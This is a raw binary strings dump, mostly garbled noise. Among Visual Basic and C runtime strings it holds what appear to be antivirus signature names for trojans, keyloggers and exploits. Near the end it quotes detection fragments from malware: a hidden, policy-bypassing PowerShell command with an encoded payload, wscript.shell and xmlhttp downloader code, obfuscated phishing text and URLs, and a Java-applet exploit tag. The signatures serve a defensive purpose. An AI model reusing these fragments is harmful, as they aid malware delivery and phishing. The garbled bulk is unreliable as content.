jdY2G ]e$,w> W\\]bC J>'De <O)7J2o qGZi<B %OIQv L ~r/`aGA e/Fnu#. G0 +> \\lhcO h,iG& h|tO\" B{*o~i] ;B{*o~i] 0MVu% l!%a (nWYNV +eRsX T(.7N yM k{ _N%>) }v.oI 8O:Re ! 1f9Zn 2Gs 2Gs |Ls9|Lsc|Ls^}Ls:}Ls Ls=vLs9 KskvLs wLs6wLs KscxLs uLsHuLs vLs%vLs vLs%vLs% LsgtLs TASKMAN.EXE Ls \"TASKMAN.EXE) WLsZMsvMs Ls%s(%d) Ls%s(%d)> Gs\\CDs4gDs9 CDsaCDs9gDs gDsUjDs0 GsnVMs Ms\\\\] [...]> Ms*.* Ms*.*c:\\X> Ks6'Ds \tNsm\tNs \tNsm\tNs> NsY Ns ,Nsa-Ns +Nsq-Ns -Ns.Ns ,Ns0-Ns ,Ns/,NsK,Ns_,Nss,Ns GsC/Ns3/Ns KsM0Ns .NsVB5DB.DLL KsnJNs JNsCLNs IsODBC ODBC; IsODBCODBC;SourceNumberHelpContextHelpFileDescription> Nsaoxomoxoa AccessObjSiteData OlePres000 NsOleUIPasteSpecialA OleUIInsertObjectA OLEDLG.DLL NsOleUIPasteSpecialAOleUIInsertObjectAOLEDLG.DLLr mbmabptebkjcdlgtjmskjwtsdhjbmkmwtrak c&Os^ mbmabptebkjcdlgtjmskjwtsdhjbmkmwtrakAdminData1WSc&Os^ &OsTypesSupported EventMessageFile System\\CurrentControlSet\\Services\\EventLog\\Application &OsTypesSupportedEventMessageFileSystem\\CurrentControlSet\\Services\\EventLog\\Application CsvCOs COs!DOsPDOs{DOs DOsgEOs4FOsxFOs GOszGOs _Os$`Os CsUdOs}dOs: Out of memory) ( tPGs$ lPGs# `PGs% TPGs' LPGs& @PGs( 4PGs! (PGs\" tPGs$lPGs#`PGs%TPGs'LPGs&@PGs(4PGs!(PGs\" xOGs. lOGs/ dOGsp \\OGsq TOGsr LOGss DOGst <OGsu 4OGsv ,OGsw $OGsx OGs.xOGs.lOGs/dOGsp\\OGsqTOGsrLOGssDOGst<OGsu4OGsv,OGsw$OGsx EnableEventMonitor VBAEV_%s FINALHANJAJUNJAHANGEULMODECHANGEACCEPTNONCONVERTCONVERTKANJIKANAF16F15F14F13F12F11F10F9F8F7F6F5F4F3F2F1HELPDELETEDELINSERTCAPSLOCKCLEARBSBKSPBACKSPACEBREAKPRTSCSCROLLLOCKNUMLOCKPGDNPGUPDOWNUPRIGHTLEFTENDHOMEESCAPEESCTABENTERCLSIDEnableEventMonitorVBAEV_%s OsUnknownProject.UnknownModule UnknownProcedure@0x%x() InternalBasicMethodCall %s.%s(...) %s.#%d(...) %s.%s %s.%s.Procedure@0x%x(...) %s.%s.%s(...) Host Event VBA_Internals UnnamedHostEvent@0x%x() VBA_unknown_function(..) .root. %s.%s.%s%s%s _B_str_ _B_var_ UnknownProcedure UnknownModule UnknownProject (...) STORED_OBJECT BLOB_OBJECT ClipboardFormat VT_??? STREAMED_OBJECT LPWSTR LPSTR HRESULT Unsigned Integer64 Integer64 Unsigned Long Unsigned Integer Unsigned Character Character VARIANT Boolean SCODE IDispatch Single Integer VBA_Compilation VBA_Initialization VBA_none VBA_Run VBA_idle_time() VBA_eval_constant_expression() VBA_new_BasicClass() VBA_PrintObject() VBA_unknown_function(...) OsUnknownProject.UnknownModuleUnknownProcedure@0x%x()InternalBasicMethodCall%s%s.%s(...)%s.#%d(...)%s.%s%s.%s.Procedure@0x%x(...)%s.%s.%s(...)Host EventVBA_InternalsUnnamedHostEvent@0x%x()VBA_unknown_function(..).root.%s.%s.%s%s%sPut_Let_$_B_str__B_var_UnknownProcedureUnknownModuleUnknownProjectUnknownProcedure,((...)UnknownModuleUnknownProject[]STORED_OBJECTBLOB_OBJECTClipboardFormatVT_???STREAMED_OBJECTLPWSTRLPSTRUDT *ArrayHRESULTvoidUINTintUnsigned Integer64Integer64Unsigned LongUnsigned IntegerUnsigned CharacterCharacterDecimalIUnknownVARIANTBooleanSCODEIDispatchStringDateCurrencyRealSingleLongIntegerNULLVBA_CompilationVBA_InitializationVBA_noneVBA_RunVBA_idle_time()VBA_eval_constant_expression()VBA_new_BasicClass()VBA_PrintObject()VBA_unknown_function(...)intl >SeSystemtimePrivilege >SeSystemtimePrivilegeERROR FALSETRUENULL 9 F!F5LAKRCSG 9 F!F5LAKRCSGK ,\"# #ERROR#FALSE##TRUE##NULL# ?* $ \t steamy |TestRecordByteDecimalUnknownVariantBooleanErrorObjectStringDateCurrencyDoubleSingleLongIntegerNullEmpty RKPs^ NothingRKPs^ KPs7LPsdLPs Gs@-Sst Gs@-SstGs -SsdGs GsD-Ss< Gs<-Ss$ Gs,-Ss -SsPGsD-Ss<Gs<-Ss$Gs,-Ss Fs8-Ss FsH-Ss Fs0-Ss Fs4-Ss| FsL-Ssp Fs$-Ssd Fs -Ss< Fs(-Ss ImmGetDefaultIMEWnd [GsImmGetDefaultIMEWndSendIMEMessageExAUSER32.DLL> 4`Gs\t e+000 runtime error TLOSS error SING error DOMAIN error R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data abnormal program termination R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point not loaded Microsoft Visual C++ Runtime Library Runtime Error! Program: e+000runtime error TLOSS error Program: ...<program name unknown> (8PX 50P (8PX ppxxxx `h````ppxxxx frexp _hypot _cabs ldexp (null)(null)_yn_y1_y0frexpfmod_hypot_cabsldexpmodffabsfloorceiltancossinsqrtatan2atanacosasintanhcoshsinhlog10logpowexp 1#QNAN 1#INF 1#IND 1#SNAN GetLastActivePopupGetActiveWindowMessageBoxAuser32.dll1#QNAN1#INF1#IND1#SNAN @Qm6t F\\Software\\VB and VBA Program Settings\\oeS Ss_^[ A@QPV 2 c&0k k%31 @(> jXG jXG jX(? @(> b` + 0.T\t +: \t +3 .{\t + o\t &\t ( h o\t &\t H ( %s F BGHu y n POST $ C 7# $ + \t ) Y 1 C]In k|> . Y( wAs @Dd ! x^3 \\K\\^ \tvG{ K@ 2 &([ }| +` 0rV E u{-n dW 3^\t JBQG W ) M$M L_ i(1; DEF@ iset fset xset tset eset )9 );?> i dfA S-=RPF:MeterpreterClassifierA:98RPF:MeterpreterClassifierALua:MsilMpAttributeMLAGGR:Tobeet_Msil_5C5C1FF3SIGATTR:MSIL/LoadPEBase64.JHSTR:Tobeet_Msil_26D8E416HSTR:Tobeet_Msil_0084C89CHSTR:Tobeet_Msil_B3EBDC8BHSTR:MSIL/Obfuscator.DotNetPatcher.AHSTR:Tobeet_Msil_96837E23HSTR:SoftwareBundler:Win32/LoadArcher.A1AGGR:Tobeet_Msil_B194E94AHSTR:Tobeet_Msil_D942BF00HSTR:Tobeet_313430A6HSTR:Maruo_exceptionAGGR:Tobeet_Msil_FC233178SIGATTR:Trojan:MSIL/Kryptik.AAR!emlHSTR:Tobeet_Msil_DC4AA089SIGA:MSIL/Suspicious.Packer.S1PEPCODE:Worm:Win32/Conficker.BHSTR:Tobeet_Msil_92640FCBHSTR:Tobeet_F160B496RANSMATTR:PeLodPackedFileHSTR:Win32/Exprio.gen!lowfiHSTR:Tobeet_709D9FEAPUA:ML:Blocked:AutoKMSHSTR:Tobeet_Msil_E7CA121CHSTR:MSIL/PvLogiciels.dotNetProtector.AAGGR:Tobeet_Msil_CD6BE4DAHSTR:AutoAttrMsil_10CDD2ECTrojan:MSIL/MakeShiftTestPEPCODE:TrojanDropper:Win32/Small.RZSCPT:JS/wp-content.AHSTR:Tobeet_Msil_545A5F34HSTR:Tobeet_Msil_1B8D0818PEPCODE:Virus:Win32/Virut.AWHSTR:AutoAttrMsil_33B35CFBHSTR:MSIL/Obfuscator.DotBundle.AHSTR:AutoAttrMsil_DF7A6DF2SIGATTR:MSIL/FileLoad4.JHSTR:RegKey/McAfee.AHSTR:ChkStackNonDwordAlignedReadAGGR:SingleExeInAceHSTR:AutoAttrMsil_34DC6377HSTR:Trojan:Win32/IsDelphiLua:ExecuteSingleExportDLL.AHSTR:Tobeet_1803F26DHSTR:Tobeet_Msil_A6710A26HSTR:Tobeet_Msil_F520C34CHSTR:VirTool:MSIL/Obfuscator.AMHSTR:Sopinar.E!stringHSTR:EXC_KingSoftComponentHSTR:Tobeet_0B8D379CHSTR:Call_Pop_Reg32_dynAGGR:Tobeet_Msil_CE9B6515PUA:ML:Blocked:iBryteInstallerHSTR:MinGWFileHSTR:AutoAttrMsil_7EC7412FHSTR:Win32/DelphiFileSIGATTR:importresolverHSTR:Tobeet_Msil_AE86A6B2AGGR:Tobeet_Msil_E4F65F9BLowfi:HSTR:ConfuserDecrypterPEPCODE:Virus:Win32/Virut.BNHSTR:NSIS.gen!AVirTool:Win32/CeeInject.gen!KK_markerHSTR:Tobeet_546F3F32HSTR:Tobeet_Msil_C1072E92TEL:AGGR:Heaple:95!mlHSTR:Tobeet_Msil_B7461033HSTR:Tobeet_Msil_408573FEHSTR:AutoAttrMsil_7E27377FHSTR:Tobeet_65CE53A2HSTR:VirTool:Win32/Obfuscator.XZAGGR:Tobeet_Msil_5D6D47C7HSTR:Tobeet_25DE9A11HSTR:Tobeet_Msil_81BF013DHSTR:Tobeet_5AE3F42BAGGR:Tobeet_Msil_7B3D6F74AGGR:Tobeet_Msil_9D38F64DTEL:Context/Artoelo.gen!BHSTR:Tobeet_Msil_83A3BBBBHSTR:Tobeet_Msil_56BC5B99HSTR:Tobeet_Msil_7FCA3D89HSTR:VirTool:MSIL/GeneralPacker.S09HSTR:Base64encryptedAVTEL:EnableTaskMgr!msilLUA:SetCloudDeliveredAttributesHSTR:AutoAttrMsil_F23C104CSIGA:TrojanSpy:MSIL/Stealer.S5HSTR:AutoAttrMsil_4650DF6FLowfi:HSTR:Win32/DomainIQ.DHSTR:Tobeet_Msil_1204FBADMSILFOP:Worm:MSIL/Autorun.ADHSTR:PossiblyClean:Corecast_Apps.Etic.ModuleName.AHSTR:Tobeet_28552658AGGR:BatFileWithLargeSizeHSTR:Tobeet_Msil_E4FF787EAGGR:Tobeet_Msil_339AF84DAGGR:Tobeet_Msil_034E3D19TEL:AGGR:PowerShell/MSILProcessWithPSrunspaceHSTR:Tobeet_7858D07BHSTR:AutoAttrMsil_09F967D2TEL:MSIL/Cusax.gen!A!SupportAGGR:Tobeet_Msil_75B3F065HSTR:PeHeaderBase64PEPCODE:Trojan:Win32/Vundo.IBHSTR:Tobeet_Msil_EF5C220CTEL:Trojan:MSIL/MakeShiftTestPUA:BundlerCluster:AutoKMS2AGGR:Tobeet_Msil_CFB99D7DHSTR:Tobeet_Msil_F3E0126EAGGR:Tobeet_Msil_F3DFB19FSIGATTR:MSIL_UntrustedWinServiceInstaller.CHSTR:Tobeet_Msil_7513810DAGGR:Tobeet_Msil_91EDAAD6HSTR:Tobeet_Msil_AEA0E892ATTRIBUTE:SIGA:MISL:PossibleCopyToRemovalbe:S1HSTR:Backdoor:Win32/ShinoBot.AHSTR:Tobeet_Msil_689363A3BRUTE:VbsFileExtStringInHeaderSCPT:Exploit:CVE-2015-8651.1HSTR:MSIL/LoressoObfus.B!decodeAGGR:Tobeet_Msil_ED9447D6BRUTE:LnkFileExtStringInFooterHSTR:MSIL/Obfuscator.MPRESS.ATEL:KillMsconfig!msilHSTR:Tobeet_A7D13044AGGR:Tobeet_Msil_F88BF6E5pea_lastscn_fakeSCPT:Exploit:O97M/CVE-2017-11882.CAGGR:Tobeet_Msil_B76B6839HSTR:Tobeet_Msil_1F630E3EHSTR:AutoAttrMsil_FF15F213AGGR:Tobeet_Msil_59045CBFSIGATTR:MSIL_UntrustedWinServiceInstaller.AHSTR:AutoAttrMsil_4B775CC8HSTR:Tobeet_9198026CHSTR:AutoAttrMsil_82E0A980HSTR:Tobeet_Msil_4D14F8AAHSTR:Tobeet_Msil_D2CAB213HSTR:Tobeet_Msil_39F0DDB1HSTR:AutoAttrMsil_D5C5054FTELPER:CERT:SoftwareBundler:Win32/BunpredeltHSTR:AutoAttrMsil_E378F90DAGGR:Tobeet_Msil_A3D9F9E2HSTR:MSIL/Obfuscator.Deepsea.DHSTR:PossiblyClean:Google.ProductName.AAGGR:Tobeet_Msil_9D7A5E2FHSTR:KnownMalwareFeature!SelfDeleteBRUTE:LnkFileExtStringInHeaderHSTR:Tobeet_990851FDHSTR:Tobeet_Msil_33EE8FD0AGGR:Tobeet_Msil_9D79293ERANSMATTR:PeLodObfusUrHSTR:TrojanDownloader:MSIL/SupdatHSTR:Tobeet_Msil_EDFD1336AGGR:Tobeet_Msil_462F4141HSTR:Tobeet_Msil_1804421BHSTR:Tobeet_Msil_93278DF3HSTR:Tobeet_Msil_C4D2561DHSTR:Tobeet_Msil_92EE92FFAGGR:Tobeet_Msil_67260B70HSTR:Tobeet_Msil_77F83911SIGATTR:ScriptInvoke!msilHSTR:Tobeet_6DAB979FTEL:Tisifi.BHSTR:AutoAttrMsil_D14E10B0HSTR:VirTool:Win32/Obfuscator.PN.1AGGR:Tobeet_Msil_DC3C1180SCPT:Exploit:O97M/CVE-2017-11882.AHSTR:VBInject.MetalSIGATTR:MSIL_UntrustedWinService.AHSTR:AutoAttrMsil_9178888EHSTR:Tobeet_Msil_C92B42E3HSTR:Tobeet_Msil_95F6DE94HSTR:MSIL/Obfuscator.CodeFort.AHSTR:Tobeet_Msil_AF7F75C7AGGR:Tobeet_Msil_CCA744D8HSTR:AutoAttrMsil_974CA641HSTR:SMA.ScriptInvoke!msilAGGR:Tobeet_Msil_37B77FA3AGGR:Tobeet_Msil_ED4BC131HSTR:MSIL/Obfuscator.Deepsea.BAGGR:Tobeet_Msil_306CC9E1HSTR:Tobeet_134C4901HSTR:VirTool:Win32/VBInject.gen!AN.2HSTR:AutoAttrMsil_EA80A033HSTR:Tobeet_Msil_919C0B87HSTR:Tobeet_Msil_794F35CDTEL:Context/Artoelo.B!suspiciousAGGR:Tobeet_Msil_560514D6SIGATTR:MSIL/FileLoad.JHSTR:Win32/SteamEncrypted.AHSTR:Trojan:Win32/Bublik.AHSTR:MSIL/GenDecnryptAlgo.S02HSTR:MSIL/ConfuserRANSMATTR:PeLodSuspDosHdrAGGR:Tobeet_Msil_4B2A1EA3HSTR:Tobeet_930AA243HSTR:Tobeet_Msil_4518E09CHSTR:Trojan:Win32/Vundo.gen!D.4TEL:CloudSuspicious_High_NewFileVirTool:MSIL/Obfuscator.AOSIGATTR:DropMZHSTR:Tobeet_Msil_F2A48A48Exploit:Win32/Wintuds.B.1HSTR:Tobeet_Msil_52F71838HSTR:PWS:Win32/Sinowal.gen!Y.3HSTR:Tobeet_85D7E005HSTR:Tobeet_Msil_BD912DE7HSTR:Tobeet_221EF57DAGGR:HSTR:Win32/PossibleKeylogger.BHSTR:VirTool:Win32/Obfuscator.EWHSTR:AutoAttrMsil_4B900A49BRUTE:Exploit:Python/CVE-2017-0143.14SIGATTR:DelAppDataAGGR:Tobeet_Msil_81D480F2BRUTE:Exploit:Python/CVE-2017-0143.15HSTR:Tobeet_250749D2HSTR:VirTool:MSIL/Obfuscator.SpicesNET.AHSTR:Win32/PossibleKeylogger.B3BRUTE:Exploit:Python/CVE-2017-0143.13HSTR:Obfuscator.Split.APIName.CBRUTE:Exploit:Python/CVE-2017-0143.12VirTool:MSIL/Obfuscator.AOHSTR:Library.Ghostscript.CHSTR:Tobeet_Msil_D43E88CBHSTR:Tobeet_4C3E1692HSTR:Tobeet_Msil_FFC22D1EAGGR:Tobeet_Msil_A65614AEHSTR:Tobeet_Msil_FD10E7D0HSTR:Tobeet_A1C80242HSTR:Tobeet_Msil_EEF6A330SIGATTR:MSIL/SuspSeq1.JHSTR:Win32/PossibleKeylogger.C1ATTRIBUTE:SIGA:MISL:PossibleDelFiles:S1CONTEXT:PUA:InstallContextMet:AttrHSTR:Tobeet_Msil_EE950FA6HSTR:Tobeet_Msil_9E2C9BCCSCPT:JS/Assignment.CharString.BInDecodedScriptSigHSTR:Tobeet_Msil_ACD443F4HSTR:Tobeet_3630D6EAHSTR:Tobeet_Msil_0BD8DC28HSTR:Language.French.AAGGR:HSTR:MSIL/PossibleKeylogger.CHSTR:VirTool:MSIL/BSOD.CheckingHSTR:AutoAttrMsil_C56CC87CGenericWhitelistHSTR:Tobeet_Msil_B92F0590AGGR:Tobeet_Msil_7236E935HSTR:AutoAttrMsil_6C630DDEBRUTE:VbsFileExtStringInFooterHSTR:Tobeet_Msil_8EC5F325HSTR:AutoAttrMsil_FD9AD31CHSTR:Tobeet_F55B09A1PEPCODE:HasDigitalSignatureHSTR:Win32/HostEXE.ALoD:Lua:PossibleShellterHSTR:HasSEHSIGATTR:PossibleURLAccessHSTR:MSIL/Obfuscator.CryptoObfuscator.BHSTR:Tobeet_Msil_8D02EAB7AGGR:Tobeet_Msil_48B84EE7AGGR:Tobeet_Msil_ADC2DD51HSTR:Win32/MipkoRANSMATTR:PeLodPackerSigMatHSTR:Tobeet_Msil_440651E5AGGR:Tobeet_Msil_E3BE96A9AGGR:Tobeet_Msil_43455B0EAGGR:Tobeet_Msil_FBFE98BCSIGATTR:VirTool:MSIL/Injector.gen!YHSTR:Tobeet_Msil_47AB4E48SIGATTR:MSIL/AVChkAGGR:Tobeet_Msil_2BB193B7HSTR:MultiBancosHSTR:ErrorMsg.AHSTR:Tobeet_C8804A3CSCRIPT:OLE.EmbeddedURL.EXESCPT:TemplateDocx.AATTRIBUTE:SIGA:Trojan:MSIL/FakeApp.S001HSTR:AutoAttrMsil_0B90B371HSTR:Tobeet_33BEBF82HSTR:Tobeet_Msil_3745F3D5HSTR:Tobeet_D9213447AGGR:Lua:MSIL:FrameworkV4HSTR:VirTool:MSIL/NetInject.APEBMPAT:DamagedPEHSTR:Virus:Win32/Virut.BNHSTR:Tobeet_33790CEEHSTR:Tobeet_588647F2HSTR:Tobeet_Msil_4EF58649HSTR:PossiblyClean:Win32/JMJ.CompanyName.AHSTR:Tobeet_Msil_38812CE1HSTR:Tobeet_60DF32E6HSTR:Tobeet_Msil_4E7CDC1DHSTR:Wizrem.X1.PrintHelperUtilityHSTR:Tobeet_Msil_499B1CA5AGGR:WebMailHSTR:Tobeet_9E67C985AGGR:Tobeet_Msil_21266A10AGGR:Tobeet_Msil_FE0927A3AGGR:Tobeet_Msil_D5715E87Lua:PuaSubstringAttributeMatchedHSTR:Tobeet_4ED50E75SIGATTR:ILProtectorHSTR:Tobeet_Msil_EE2738FAHSTR:UpxPacked.AAGGR:Tobeet_Msil_B189FC61ATTRIBUTE:Suspicious:MSIL:GmailSendTxt.A!bitSCPT:JS/Assignment.CharString.AHSTR:Tobeet_Msil_A73192F9HSTR:Tobeet_Msil_A364CADFAGGR:Lua:MSIL:UnknownFrameworkVersionHSTR:Tobeet_Msil_150B5DF7HSTR:Tobeet_Msil_496D4298HSTR:Tobeet_F7963682AGGR:Tobeet_Msil_4A968A97HSTR:MSIL/Malicious.Decryption.AHSTR:AutoAttrMsil_869F9627HSTR:Tobeet_Msil_7DAADFB9AGGR:Tobeet_Msil_476EF7E1HSTR:AutoAttrMsil_23618351HSTR:Tobeet_Msil_2D62B3D3AGGR:Tobeet_Msil_165C791CHSTR:Tobeet_407BB6B0HSTR:MSIL/Obfuscator.SmartAssembly.CHSTR:Tobeet_Msil_A3F76B9CHSTR:Tobeet_Msil_8B76F10AHSTR:Tobeet_Msil_EF8DF95EHSTR:Trojan:Win32/Vundo.gen!BD.2HSTR:MSIL/Obfuscator.DotNETReactor.AHSTR:AutoAttrMsil_E874F0DBAGGR:Tobeet_Msil_909CF9B3HSTR:Win32/SecurityCenter.AAGGR:Tobeet_Msil_5E82314EHSTR:Tobeet_Msil_B3344C1DHSTR:AutoAttrMsil_35DD14ECHSTR:Tobeet_Msil_2DF535FEHSTR:Tobeet_Msil_E8EECC91HSTR:Tobeet_Msil_3258A526AGGR:Tobeet_Msil_85E31AF3HSTR:Tobeet_Msil_B1EA3F66SIGA:TrojanSpy:MSIL/Keylogger.BZHSTR:AutoAttrMsil_20A9FBF6HSTR:Win32/PossibleBankerHSTR:VirTool:MSIL/Obfuscator.S06HSTR:Tobeet_Msil_2CD7415FHSTR:Websites_Found_Download_Bladabindi_BHSTR:Tobeet_D80300B4HSTR:MSIL/Obfuscator.Confuser.CSIGATTR:RunKey!msilHSTR:ML:Win32/Banload_BFL_FOLDERAGGR:Tobeet_Msil_33F287C8AGGR:Tobeet_Msil_F74E1FACHSTR:Tobeet_0D7C2009AGGR:Tobeet_Msil_F3E44878PEPCODE:Trojan:Win32/Vundo.JC.dllHSTR:Tobeet_Msil_B96FA3FFVirTool:MSIL/ToolchkAGGR:Tobeet_Msil_D7DF9230AGGR:Tobeet_Msil_EA827B9BAGGR:Tobeet_Msil_4E74E379AGGR:Tobeet_Msil_5D3187D8HSTR:Tobeet_98D81B9CHSTR:AutoAttrMsil_939FC773HSTR:AutoAttrMsil_CE5BBEAEHSTR:Tobeet_Msil_1DA7EA5AAGGR:Tobeet_Msil_F4AA4C5EAGGR:Tobeet_Msil_D9AAA802HSTR:Tobeet_Msil_0F547466AGGR:Tobeet_Msil_9EDEF1AFHSTR:Tobeet_Msil_33901747HSTR:Tobeet_AF7A27D8HSTR:Tobeet_Msil_BD9FDBC2HSTR:Tobeet_3560ADB8AGGR:Tobeet_Msil_4469FCE6HSTR:Tobeet_Msil_CD3D81BDAGGR:Tobeet_Msil_B46C56D8TEL:SqlConnectDB!msilAGGR:Tobeet_Msil_F5546CADHSTR:MFCFileAGGR:Tobeet_Msil_22AA1440HSTR:AutoAttrMsil_E2703509AGGR:Tobeet_Msil_F5638B71AGGR:Tobeet_Msil_A1E2B706AGGR:Tobeet_Msil_951C3159SIGATTR:MSIL_UntrustedWinServiceInstaller.BHSTR:Tobeet_Msil_AFD867A4AGGR:Tobeet_Msil_0DB328BFHSTR:AutoAttrMsil_6B222062HSTR:Win32/FS18.StackBase.ALowfi:HSTR:Win32/Solimba.BHSTR:TrojanDownloader:MSIL/Pstinb.AAGGR:Tobeet_Msil_DD7CF9CDHSTR:MSIL/NameSpace.CompilerServices.AHSTR:PossibleDownloader.AHSTR:Tobeet_Msil_545CC12DAGGR:Tobeet_Msil_C2CEB60DAllowList:Aggr/Fuerboos.AHSTR:FMAuditInstallerRANSMATTR:PeLodNoExceptionHSTR:Zwangi_NamesHSTR:AutoAttrMsil_4493F337HSTR:Tobeet_Msil_5A4072D2HSTR:Tobeet_Msil_551230B0HSTR:VirTool:Win32/VBInject.RT.1HSTR:URL:tempuri.org.AHSTR:Tobeet_DFE2334CHSTR:Tobeet_EB264A5CHSTR:Tobeet_17A16FD2AGGR:Tobeet_Msil_27187C07ATTRIBUTE:SIGA:MISL:RunKeySet:S1HSTR:Tobeet_Msil_B206EEB3HSTR:Tobeet_55EADFD7Exploit:O97M/DDEDownloader.D5AGGR:Tobeet_Msil_4E8D0A83HSTR:MSIL/ClassRijndaelManaged.ASIGATTR:VirTool:MSIL/Injector.SC!bitFOP:Win32/Nuwar.unsafeMS08067_DIRTRAVERSALAGGR:Tobeet_Msil_1B65054DHSTR:Tobeet_Msil_9331117DHSTR:Tobeet_Msil_B9F864EBHSTR:Exploit:MSIL/SivliatAllowList:Citrix:LauncherStubHSTR:Tobeet_Msil_95AF063DHSTR:MSIL/PossibleKeylogger.A5HSTR:TrojanDownloader:Win32/Banload.gen!F.2SIGATTR:SMA.ScriptInvoke!msilHSTR:MSIL/Class.UriBuilder.AAGGR:Tobeet_Msil_D5058380HSTR:Tobeet_DE18E8FAHSTR:AutoAttrMsil_3C4F69E2HSTR:Tobeet_Msil_F5634504HSTR:Win32/Domain.BRLowfi:HSTR:Win32/AgileDotNetObfuscatordo_nounpack_rescanRANSMATTR:PeLodNoExportsATTRIBUTE:SIGA:TrojanDownloader:MSIL/Genmaldow.S14Exploit:Win32/Wintuds.B.3ATTRIBUTE:SIGA:MSIL:EMAIL:S1HSTR:AutoAttrMsil_70780AE9AGGR:Tobeet_Msil_697F93B7HSTR:AutoAttrMsil_754C6246AGGR:Tobeet_Msil_12E118B5AGGR:Tobeet_Msil_4DB51E0CHSTR:AutoAttrMsil_6A753B13AGGR:Tobeet_Msil_5018F61FHSTR:LZMA_CRC32_CONST_TABLEHSTR:Tobeet_Msil_3D8A0EE2HSTR:AutoAttrMsil_93B7577FLowfi:HSTR:Win32/PullUpdateHSTR:MSIL/PossibleKeylogger.A3HSTR:Tobeet_Msil_E076BF4AHSTR:Virtool:KillavHSTR:Tobeet_Msil_E872EC6EHSTR:TrojanDownloader:Win32/Wintrim.BFLUA:MissingDigitalSignatureHSTR:Tobeet_Msil_3B1E4824AGGR:Tobeet_Msil_A74BB38FTrojan:MSIL/BlackFus.BTEL:KillExplorer!msilHSTR:AutoAttrMsil_1F6F7011AGGR:Trojan:MSIL/InjGen.J!ibtHSTR:AutoAttrMsil_C34C6E12HSTR:Win32/PossibleKeylogger.A2AGGR:Tobeet_Msil_7ECD5743AGGR:Tobeet_Msil_97C8BBB3AGGR:SingleExeInArchivePUA:FileHSTR:Tobeet_Msil_8A952C9BHSTR:Tobeet_Msil_F96CC401SIGA:MSIL/Suspicious.CreateRunKey.AHSTR:InstallerFileHSTR:AutoAttrMsil_0CAEB229HSTR:Wuvsked.A2AGGR:Tobeet_Msil_5AC26183HSTR:AutoAttrMsil_E872EC6EHSTR:Tobeet_FFF59FFCATTRIBUTE:SIGA:MSIL:EMAIL:Behavior:S1HSTR:Tobeet_Msil_F27CAD14HSTR:Tobeet_Msil_97B129F9AGGR:Tobeet_Msil_FAB66F1BHSTR:AutoAttrMsil_3531EC7EAGGR:Tobeet_Msil_120C0F0EHSTR:Tobeet_Msil_1698F25DHSTR:AutoAttrMsil_DD5EA684PUA:ML:Blocked:LinkuryHSTR:Tobeet_Msil_08304DE3HSTR:AutoAttrMsil_59393B60HSTR:Tobeet_B2E35A87AGGR:Tobeet_Msil_6C5AB82BHSTR:Tobeet_Msil_3AC40B50DOTNET_Reactor_ObfuscatorAGGR:Tobeet_Msil_7E4939BFAGGR:Tobeet_Msil_53B88CC3HSTR:BetterSurfSIGATTR:Trojan:Win32/C2Lop.gen!GHSTR:PossiblyClean:Redgate.RegKey.AHSTR:Virtool:MSIL/Obfuscator.DNGuardSIGATTR:SetItselfRunKeyMJvAyulA 5@x 5@ @Gq _D @P WEB 1 .exe .gif s ?)c 071bq e8 ~P zuD~L _](qvf 9~Bq4 ^4{-P EHZ?w `\"xdy pFAw1 A!#[r` d{AJm g{:\t0 v!,A`9 ^+:R+ l\tpHB= y4gUi wrSE6 RzUZ<\" 5[T!gb KIafEP G^P}Y kA-de~ t}S C& hi{1< VX@iL \"J&K} ia~0T _^bsx N/g1p\\ m8n}\\ sx/Oy X;?bw p1*KP X@Jo-cE YllM\"4 3@Hlc s<. 0 yzIlS ER`I6 6-.QS 1dHHl{ +\\>9} Bv! w >O&aI g>MQh k7T!D 5 ,xR1g U~P|b$T wqzl`N (VY]K Cd7Rz tOiny v]Snn ~%#mI GDN|Y u#X$} mU;Z1 K.e E %Kh\t^l 1i%*G 23456789.exe\\setup 0123456789.exe 0123456789install 0123456789.exe\\install 0123456789.exenullsoftinstallsystemv2.46setup !#SCPT:Trojan:HTML/Phish.JD2 url=http://mai-1.burbery.co/.vm/.vm/#y2xpzw50zxnabgv4dxnhdxrvlmvz\"> *!#SCPT:TrojanDownloader:VBS/Powdow.PB3!MTB =\"powershell.exe-exbypass-nop-whidden-eccqajaakacqajaakacqajaakacqagafmazqbuac0aywbvag4adablag4adaajacaaiaagacaaiaagacaacqatafyaqqajacaaiaaoaakacqagaakaiaajacaacqajaakaiaajaakaiaajac4akaanae4azqana 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDEA!MTB!ED7 <docsecurity>0</docsecurity><scalecrop>false</scalecrop><headingpairs><vt:vectorsize=\"4\"basetype=\"variant\"><vt:variant><vt:lpstr>worksheets</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4> !#SCPT:Schopets.H1 =\".respo createobject(\"wscript\"+\".shell\")endfunction =\"microsoft.xmlhttp \"+\"shell.application wscript\"+\".shell `.run .createtextfile @split(replace( .sendendfunction !#SCPT:VBS/Adnel.D0 createobject(\"s\"&chrw(99)&chrw(114)&chrw(105)&\"pt\"&chrw(105)&chrw(110)&chrw(103)&chrw(46)&chrw(70)&chrw(105)&chrw(108)&chrw(101)&chrw(83)&\"ystem\"&chrw(79)&chrw(98)&\"ject\")m= .opentextfile(wscript.scriptfullname).readall !#SCPT:JS/Obfuse.RA!MTB 'yur\\x20mil\\x20r\\x20sswrd\\x20is\\x20inrrt.\\x20if\\x20yu\\x20dn\\x27t\\x20rmmbr\\x20yur\\x20sswrd,,<a\\x20href=\\x22#\\x22>\\x20reset\\x20it\\x20now.<a/>\\x20<br>\\x20<br>\\x20','post',' .ijsiodjfo.ml/index.php?user= 'https://www /'https://www !#SCPT:Trojan:BAT/Tnega.SMK1 start-sleep-s5;rename-item-path('%grkd_suciuyzed_s_zshrn_xj_oznks%\\bin.~tmp')-newname('%bkjx_bfctfkdxpmzgj%.~tmp');rename-item-path('%grkd_suciuyzed_s_zshrn_xj_oznks%\\bin.exe')-newname('%bkjx_bfctfkdxpmzgj%.exe') !#SCPT:Exploit:HTML/Axpergle.E <paramname=\"code\"value=\"globals\"><paramname=\"archive\"value=\"http:// 0\ta-z0-9=_- \ta-z0-9=_-\"><paramname=\"type\"value=\"application/x-java-applet\"><paramname=\"exteeec\"value=\" a-z0-9=\"></object> \"!#SCPT:Trojan:HTML/Phish.AVZ22!MTB 